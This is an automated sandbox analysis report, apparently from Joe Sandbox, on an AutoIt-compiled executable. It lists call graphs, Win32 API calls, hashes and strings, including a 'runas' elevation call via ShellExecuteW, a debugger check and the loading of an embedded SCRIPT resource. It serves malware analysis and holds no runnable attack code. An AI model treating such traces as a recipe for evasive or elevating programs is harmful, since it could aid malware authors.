94714 326e10 8 API calls __controlfp_s 94614->94714 94615 32ee8d 94699 327c0e 47 API calls __getptd_noexit 94615->94699 94617 32eeb4 94700 327bda 47 API calls __getptd_noexit 94617->94700 94618->94617 94620 32eece 94618->94620 94622 32eeec 94618->94622 94652 32ee3b 94618->94652 94620->94617 94626 32eed9 94620->94626 94701 3269d0 47 API calls _W_store_winword 94622->94701 94625 333bf2 __stbuf 47 API calls 94628 32efed 94625->94628 94626->94625 94627 32eefc 94629 32ef04 94627->94629 94630 32ef1f 94627->94630 94632 32f066 ReadFile 94628->94632 94637 32f003 GetConsoleMode 94628->94637 94702 327c0e 47 API calls __getptd_noexit 94629->94702 94704 32f82f 49 API calls 3 library calls 94630->94704 94635 32f546 GetLastError 94632->94635 94636 32f088 94632->94636 94634 32ef09 94703 327bda 47 API calls __getptd_noexit 94634->94703 94640 32f553 94635->94640 94641 32f046 94635->94641 94636->94635 94646 32f058 94636->94646 94642 32f063 94637->94642 94643 32f017 94637->94643 94638 32ef2d 94638->94626 94710 327c0e 47 API calls __getptd_noexit 94640->94710 94654 32f04c 94641->94654 
94705 327bed 47 API calls 3 library calls 94641->94705 94642->94632 94643->94642 94647 32f01d ReadConsoleW 94643->94647 94644 32ef14 94644->94652 94646->94654 94655 32f0bd 94646->94655 94662 32f32a 94646->94662 94647->94646 94649 32f040 GetLastError 94647->94649 94648 32f558 94711 327bda 47 API calls __getptd_noexit 94648->94711 94649->94641 94652->94589 94653 321c9d _free 47 API calls 94653->94652 94654->94652 94654->94653 94657 32f129 ReadFile 94655->94657 94663 32f1aa 94655->94663 94658 32f14a GetLastError 94657->94658 94671 32f154 94657->94671 94658->94671 94659 32f267 94666 32f217 MultiByteToWideChar 94659->94666 94708 32f82f 49 API calls 3 library calls 94659->94708 94660 32f257 94707 327c0e 47 API calls __getptd_noexit 94660->94707 94661 32f430 ReadFile 94665 32f453 GetLastError 94661->94665 94670 32f461 94661->94670 94662->94654 94662->94661 94663->94654 94663->94659 94663->94660 94663->94666 94665->94670 94666->94649 94666->94654 94670->94662 94709 32f82f 49 API calls 3 library calls 94670->94709 94671->94655 94706 32f82f 49 API calls 3 library calls 94671->94706 94673 32eb71 94672->94673 94677 32eb86 94672->94677 94745 327c0e 47 API calls __getptd_noexit 94673->94745 94675 32eb76 94746 326e10 8 API calls __controlfp_s 94675->94746 94678 32ebbb 94677->94678 94684 32eb81 94677->94684 94747 333e24 47 API calls __malloc_crt 94677->94747 94680 322933 __stbuf 47 API calls 94678->94680 94681 32ebcf 94680->94681 94715 32ed06 94681->94715 94683 32ebd6 94683->94684 94685 322933 __stbuf 47 API calls 94683->94685 94684->94589 94686 32ebf9 94685->94686 94686->94684 94687 322933 __stbuf 47 API calls 94686->94687 94688 32ec05 94687->94688 94688->94684 94689 322933 __stbuf 47 API calls 94688->94689 94690 32ec12 94689->94690 94691 322933 __stbuf 47 API calls 94690->94691 94691->94684 94692->94597 94693->94591 94694->94589 94695->94597 94696->94606 94697->94652 94698->94615 94699->94614 94700->94615 94701->94627 94702->94634 94703->94644 94704->94638 94705->94654 
94706->94671 94707->94654 94708->94666 94709->94670 94710->94648 94711->94654 94712->94610 94713->94614 94714->94652 94716 32ed12 __fcloseall 94715->94716 94717 32ed32 94716->94717 94718 32ed1a 94716->94718 94720 32eded 94717->94720 94724 32ed68 94717->94724 94719 327bda __set_osfhnd 47 API calls 94718->94719 94721 32ed1f 94719->94721 94722 327bda __set_osfhnd 47 API calls 94720->94722 94723 327c0e __controlfp_s 47 API calls 94721->94723 94725 32edf2 94722->94725 94737 32ed27 __fcloseall 94723->94737 94727 32ed75 94724->94727 94728 32ed8a 94724->94728 94726 327c0e __controlfp_s 47 API calls 94725->94726 94730 32ed82 94726->94730 94731 327bda __set_osfhnd 47 API calls 94727->94731 94729 32a8ed ___lock_fhandle 49 API calls 94728->94729 94732 32ed90 94729->94732 94736 326e10 __controlfp_s 8 API calls 94730->94736 94733 32ed7a 94731->94733 94734 32eda3 94732->94734 94735 32edb6 94732->94735 94738 327c0e __controlfp_s 47 API calls 94733->94738 94739 32ee0e __wsopen_helper 59 API calls 94734->94739 94740 327c0e __controlfp_s 47 API calls 94735->94740 94736->94737 94737->94683 94738->94730 94741 32edaf 94739->94741 94742 32edbb 94740->94742 94744 32ede5 __filbuf LeaveCriticalSection 94741->94744 94743 327bda __set_osfhnd 47 API calls 94742->94743 94743->94741 94744->94737 94745->94675 94746->94684 94747->94678 94751 32344a GetSystemTimeAsFileTime 94748->94751 94750 34bdc3 94750->94361 94752 323478 __aulldiv 94751->94752 94752->94750 94754 323e71 __fcloseall 94753->94754 94755 323e94 94754->94755 94756 323e7f 94754->94756 94758 324e1c __lock_file 48 API calls 94755->94758 94767 327c0e 47 API calls __getptd_noexit 94756->94767 94760 323e9a 94758->94760 94759 323e84 94768 326e10 8 API calls __controlfp_s 94759->94768 94769 323b0c 55 API calls 6 library calls 94760->94769 94763 323ea5 94770 323ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94763->94770 94765 323eb7 94766 323e8f __fcloseall 94765->94766 94766->94366 94767->94759 94768->94766 94769->94763 94770->94765 
94772 321e61 94771->94772 94775 321e55 94771->94775 94795 327c0e 47 API calls __getptd_noexit 94772->94795 94774 322019 94780 321e41 94774->94780 94796 326e10 8 API calls __controlfp_s 94774->94796 94775->94772 94782 321ed4 94775->94782 94790 329d6b 47 API calls __controlfp_s 94775->94790 94778 321fa0 94778->94772 94778->94780 94783 321fb0 94778->94783 94779 321f5f 94779->94772 94781 321f7b 94779->94781 94792 329d6b 47 API calls __controlfp_s 94779->94792 94780->93890 94781->94772 94781->94780 94786 321f91 94781->94786 94782->94772 94789 321f41 94782->94789 94791 329d6b 47 API calls __controlfp_s 94782->94791 94794 329d6b 47 API calls __controlfp_s 94783->94794 94793 329d6b 47 API calls __controlfp_s 94786->94793 94789->94778 94789->94779 94790->94782 94791->94789 94792->94781 94793->94780 94794->94780 94795->94774 94796->94780 94797->94301 94799 322aba __fcloseall 94798->94799 94800 322ad4 94799->94800 94801 322aec 94799->94801 94803 322ae4 __fcloseall 94799->94803 94863 327c0e 47 API calls __getptd_noexit 94800->94863 94804 324e1c __lock_file 48 API calls 94801->94804 94803->94304 94806 322af2 94804->94806 94805 322ad9 94864 326e10 8 API calls __controlfp_s 94805->94864 94851 322957 94806->94851 94812 34c715 94811->94812 94813 34c6ff SetFileTime CloseHandle 94811->94813 94812->94282 94813->94812 94819 34c581 __tzset_nolock _wcscmp 94814->94819 94815 3044ed 64 API calls 94815->94819 94816 34c05f 94816->94279 94816->94282 94817 34bf5a GetSystemTimeAsFileTime 94817->94819 94818 304517 83 API calls 94818->94819 94819->94815 94819->94816 94819->94817 94819->94818 94821 34b970 94820->94821 94822 34b97e 94820->94822 94823 323499 117 API calls 94821->94823 94824 34b9c3 94822->94824 94825 323499 117 API calls 94822->94825 94835 34b987 94822->94835 94823->94822 94869 34bbe8 94824->94869 94826 34b9a8 94825->94826 94826->94824 94828 34b9b1 94826->94828 94832 3235e4 __fcloseall 83 API calls 94828->94832 94828->94835 94829 34ba07 94830 34ba2c 94829->94830 94831 34ba0b 
[Call graph: rendered graph widget; the node/edge list is not reproduced here. Win32 APIs named as call targets in this portion of the graph: CharUpperBuffW, GetVersionExW, GetCurrentProcess, LoadLibraryA, GetProcAddress, FreeLibrary, GetSystemInfo, GetNativeSystemInfo, GetStdHandle, CoInitialize, CreateThread, CloseHandle, RegisterWindowMessageW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, Sleep, RtlAllocateHeap, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, IsThemeActive, SystemParametersInfoW, GetCurrentDirectoryW, SetCurrentDirectoryW, MessageBoxA, GetOpenFileNameW, GetSystemTimeAsFileTime, GetLongPathNameW. CRT routines named: __fcloseall, _memcpy_s, __getptd_noexit, __controlfp_s, _fseek, __flush, __stbuf, __flswbuf, __tzset_nolock, __fread_nolock, _W_store_winword, _free, __cinit, __RTC_Initialize, __wwincmdln, _doexit, __lock, __calloc_crt, __calloc_impl, @_EH4_CallFilterFunc@8, _wparse_cmdline, __NMSG_WRITE, __initterm_e, __initp_misc_cfltcvt_tab, __IsNonwritableInCurrentImage, _memset, ___raise_securityfailure, __ftell_nolock, _wprintf, __wsplitpath, _wcscat, _wcscpy.]

                                                                            Control-flow Graph
                                                                            
                                                                            [Rendered control-flow graph for the function spanning 32b043-32b86c (executed / not executed blocks are colour-coded in the widget); the basic-block edge list is not reproduced here. Internal calls visible in the graph: 32f8a0, 32a70c, 327bda, 327c0e, 326e10, 32f82f, 333bf2, 327a0d, 321688, 3340f7, 335884, 327bed. Win32 APIs called: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError.]
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17b100a62c49d36fea2f6b100c96aad0f940b786e0b086efe80b777f0f29e50f
                                                                            • Instruction ID: 93f2bf33824f849b3371a467e5c36cb3fcf1220f6e517a2cb96f3b19def44383
                                                                            • Opcode Fuzzy Hash: 17b100a62c49d36fea2f6b100c96aad0f940b786e0b086efe80b777f0f29e50f
                                                                            • Instruction Fuzzy Hash: ED326075B022688BCB26DF54EC81AE9B7B9FF46310F1541D9E40AE7A91D7309D80CF52

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00303AA3,?), ref: 00303D45
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00303AA3,?), ref: 00303D57
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,003C1148,003C1130,?,?,?,?,00303AA3,?), ref: 00303DC8
                                                                              • Part of subcall function 00306430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00303DEE,003C1148,?,?,?,?,?,00303AA3,?), ref: 00306471
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,00303AA3,?), ref: 00303E48
                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003B28F4,00000010), ref: 00371CCE
                                                                            • SetCurrentDirectoryW.KERNEL32(?,003C1148,?,?,?,?,?,00303AA3,?), ref: 00371D06
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0039DAB4,003C1148,?,?,?,?,?,00303AA3,?), ref: 00371D89
• ShellExecuteW.SHELL32(00000000,?,?,?,?,00303AA3), ref: 00371D90
  • Part of subcall function 00303E6E: GetSysColorBrush.USER32(0000000F), ref: 00303E79
  • Part of subcall function 00303E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00303E88
  • Part of subcall function 00303E6E: LoadIconW.USER32(00000063), ref: 00303E9E
  • Part of subcall function 00303E6E: LoadIconW.USER32(000000A4), ref: 00303EB0
  • Part of subcall function 00303E6E: LoadIconW.USER32(000000A2), ref: 00303EC2
  • Part of subcall function 00303E6E: RegisterClassExW.USER32(?), ref: 00303F30
  • Part of subcall function 003036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003036E6
  • Part of subcall function 003036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00303707
  • Part of subcall function 003036B8: ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 0030371B
  • Part of subcall function 003036B8: ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 00303724
  • Part of subcall function 00304FFC: _memset.LIBCMT ref: 00305022
  • Part of subcall function 00304FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003050CB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
• String ID: ();$This is a third-party compiled AutoIt script.$runas
• API String ID: 438480954-580701920
• Opcode ID: 00c64bf18a21f362ae18341a945538fd93a0c571fe424007c9e3adf13065365b
• Instruction ID: ae2511ba593a8a72771fb71074358f7d12d5618a2f37416c1ea8310a8c61f3fa
• Opcode Fuzzy Hash: 00c64bf18a21f362ae18341a945538fd93a0c571fe424007c9e3adf13065365b
• Instruction Fuzzy Hash: 62512832A05248AECF13ABF4DC62EEE7B7D9F06704F044168F201AA1D3CB785A45DB21

Control-flow Graph (graph image not reproduced; function 0031DDC0-0031DF3B)
APIs
• GetVersionExW.KERNEL32(?), ref: 0031DDEC
• GetCurrentProcess.KERNEL32(00000000,0039DC38,?,?), ref: 0031DEAC
• GetNativeSystemInfo.KERNELBASE(?,0039DC38,?,?), ref: 0031DF01
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0031DF0C
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0031DF1F
• GetSystemInfo.KERNEL32(?,0039DC38,?,?), ref: 0031DF29
• GetSystemInfo.KERNEL32(?,0039DC38,?,?), ref: 0031DF35
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
• String ID:
• API String ID: 3851250370-0
• Opcode ID: 0be72cb198a4ca3c33056fc2b642f7344f6a21b5d35606120cc149f3192fd7cf
• Instruction ID: 71e9383b8fe4ff8becfcb5695880ba48f8076d03929136c941153bc1509aded4
• Opcode Fuzzy Hash: 0be72cb198a4ca3c33056fc2b642f7344f6a21b5d35606120cc149f3192fd7cf
• Instruction Fuzzy Hash: CC61857180A384DFCF1BCF6998C15EA7FB46F2A300F1A85D9D8499F247C624CA49CB65

Control-flow Graph (graph image not reproduced; function 0030406B-00374F6E)
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0030449E,?,?,00000000,00000001), ref: 0030407B
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0030449E,?,?,00000000,00000001), ref: 00304092
• LoadResource.KERNEL32(?,00000000,?,?,0030449E,?,?,00000000,00000001,?,?,?,?,?,?,003041FB), ref: 00374F1A
• SizeofResource.KERNEL32(?,00000000,?,?,0030449E,?,?,00000000,00000001,?,?,?,?,?,?,003041FB), ref: 00374F2F
• LockResource.KERNEL32(0030449E,?,?,0030449E,?,?,00000000,00000001,?,?,?,?,?,?,003041FB,00000000), ref: 00374F42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: 3c81e1f0514062448b3d38b0ffabe78c9f1f696d244c8a5557cb4f13c68cd931
• Instruction ID: 091bf58d5c650238b34c4f86a261a9a43f9417b91505d94a484f0e603ddd6672
• Opcode Fuzzy Hash: 3c81e1f0514062448b3d38b0ffabe78c9f1f696d244c8a5557cb4f13c68cd931
• Instruction Fuzzy Hash: AC113071200705BFE7228B65EC58F67BBBDEBC5B51F1045ACF60696290DB71DD048B20
APIs
• GetFileAttributesW.KERNELBASE(?,00372F49), ref: 00346CB9
• FindFirstFileW.KERNELBASE(?,?), ref: 00346CCA
• FindClose.KERNEL32(00000000), ref: 00346CDA
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 62ff687ff2b5305b3390835378a48324c2c40461244706612ff6d65f1f1daeba
• Instruction ID: c8725c66344b2ba51544de1be2f4e8f29bfb4f43dbef402bda0e251461ef1929
• Opcode Fuzzy Hash: 62ff687ff2b5305b3390835378a48324c2c40461244706612ff6d65f1f1daeba
• Instruction Fuzzy Hash: 4FE048318146155786116B38EC4E8E977ACDE06339F104755F575C51D0E770ED4446D6
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030E959
• timeGetTime.WINMM ref: 0030EBFA
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030ED2E
• TranslateMessage.USER32(?), ref: 0030ED3F
• DispatchMessageW.USER32(?), ref: 0030ED4A
• LockWindowUpdate.USER32(00000000), ref: 0030ED79
• DestroyWindow.USER32 ref: 0030ED85
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0030ED9F
• Sleep.KERNEL32(0000000A), ref: 00375270
• TranslateMessage.USER32(?), ref: 003759F7
• DispatchMessageW.USER32(?), ref: 00375A05
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00375A19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: 5a850bbd6473f76f1c2ce3b1ed7b9a763a17a555737fb64eaaf211c0078480f5
• Instruction ID: 1894efc84bb2abe3d1a8341f3e9963a418366e1b8d0f409e100abb075e9171f5
• Opcode Fuzzy Hash: 5a850bbd6473f76f1c2ce3b1ed7b9a763a17a555737fb64eaaf211c0078480f5
• Instruction Fuzzy Hash: 4B62A370609340DFDB2ADF24C895BAA77E8BF45304F04496DE94A8F2D2DBB5E844CB52
APIs
• ___createFile.LIBCMT ref: 00335EC3
• ___createFile.LIBCMT ref: 00335F04
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00335F2D
• __dosmaperr.LIBCMT ref: 00335F34
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00335F47
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00335F6A
• __dosmaperr.LIBCMT ref: 00335F73
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00335F7C
• __set_osfhnd.LIBCMT ref: 00335FAC
• __lseeki64_nolock.LIBCMT ref: 00336016
• __close_nolock.LIBCMT ref: 0033603C
• __chsize_nolock.LIBCMT ref: 0033606C
• __lseeki64_nolock.LIBCMT ref: 0033607E
• __lseeki64_nolock.LIBCMT ref: 00336176
• __lseeki64_nolock.LIBCMT ref: 0033618B
• __close_nolock.LIBCMT ref: 003361EB
  • Part of subcall function 0032EA9C: CloseHandle.KERNELBASE(00000000,003AEEF4,00000000,?,00336041,003AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0032EAEC
  • Part of subcall function 0032EA9C: GetLastError.KERNEL32(?,00336041,003AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0032EAF6
  • Part of subcall function 0032EA9C: __free_osfhnd.LIBCMT ref: 0032EB03
  • Part of subcall function 0032EA9C: __dosmaperr.LIBCMT ref: 0032EB25
  • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
• __lseeki64_nolock.LIBCMT ref: 0033620D
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00336342
• ___createFile.LIBCMT ref: 00336361
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0033636E
• __dosmaperr.LIBCMT ref: 00336375
• __free_osfhnd.LIBCMT ref: 00336395
• __invoke_watson.LIBCMT ref: 003363C3
• __wsopen_helper.LIBCMT ref: 003363DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
• String ID: @
• API String ID: 3896587723-2766056989
• Opcode ID: 834686de6645ce8cedaf155be5ade5c3a32aa6b6fc071c2f9ba54256c73ad575
• Instruction ID: d7c8e73098f8658264364f1ba5548ff5e596afca8aee607f1ec67de71e42f3a8
• Opcode Fuzzy Hash: 834686de6645ce8cedaf155be5ade5c3a32aa6b6fc071c2f9ba54256c73ad575
• Instruction Fuzzy Hash: A8221671904605AFEB2B9F68DCC6BEE7B75EB10324F268229E521DB2E1C3358D50C791


                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _wcscpy.LIBCMT ref: 0034FA96
                                                                            • _wcschr.LIBCMT ref: 0034FAA4
                                                                            • _wcscpy.LIBCMT ref: 0034FABB
                                                                            • _wcscat.LIBCMT ref: 0034FACA
                                                                            • _wcscat.LIBCMT ref: 0034FAE8
                                                                            • _wcscpy.LIBCMT ref: 0034FB09
                                                                            • __wsplitpath.LIBCMT ref: 0034FBE6
                                                                            • _wcscpy.LIBCMT ref: 0034FC0B
                                                                            • _wcscpy.LIBCMT ref: 0034FC1D
                                                                            • _wcscpy.LIBCMT ref: 0034FC32
                                                                            • _wcscat.LIBCMT ref: 0034FC47
                                                                            • _wcscat.LIBCMT ref: 0034FC59
                                                                            • _wcscat.LIBCMT ref: 0034FC6E
                                                                              • Part of subcall function 0034BFA4: _wcscmp.LIBCMT ref: 0034C03E
                                                                              • Part of subcall function 0034BFA4: __wsplitpath.LIBCMT ref: 0034C083
                                                                              • Part of subcall function 0034BFA4: _wcscpy.LIBCMT ref: 0034C096
                                                                              • Part of subcall function 0034BFA4: _wcscat.LIBCMT ref: 0034C0A9
                                                                              • Part of subcall function 0034BFA4: __wsplitpath.LIBCMT ref: 0034C0CE
                                                                              • Part of subcall function 0034BFA4: _wcscat.LIBCMT ref: 0034C0E4
                                                                              • Part of subcall function 0034BFA4: _wcscat.LIBCMT ref: 0034C0F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$t2;
                                                                            • API String ID: 2955681530-1029947341
                                                                            • Opcode ID: 9a01b10c15c8aecb3f064c4ee9d5176dead5cc609b62f7699c6b55ba5c9a66f3
                                                                            • Instruction ID: 57340399d09f4ca0bd0f9b38c572e40398830e3436895ace9102fb40faedab0f
                                                                            • Opcode Fuzzy Hash: 9a01b10c15c8aecb3f064c4ee9d5176dead5cc609b62f7699c6b55ba5c9a66f3
                                                                            • Instruction Fuzzy Hash: 77919171504215AFCB16EB54C891F9AB3E8FF44310F044869F9899F292DB30FA48CB92
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3074181302-0
                                                                            • Opcode ID: 1dee04cb80dbc945d6554f2a81b32c1abdb268821ddf11a06652883bc76cf13d
                                                                            • Instruction ID: 180537146960f792f9e262381edc583357729d34a3d950be1299f81299e88082
                                                                            • Opcode Fuzzy Hash: 1dee04cb80dbc945d6554f2a81b32c1abdb268821ddf11a06652883bc76cf13d
                                                                            • Instruction Fuzzy Hash: 4C324974A042A5DFDB23CF68F840BBD7BB5AF46314F2A4179E8559F292C7709841CBA0

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0034BDB4: __time64.LIBCMT ref: 0034BDBE
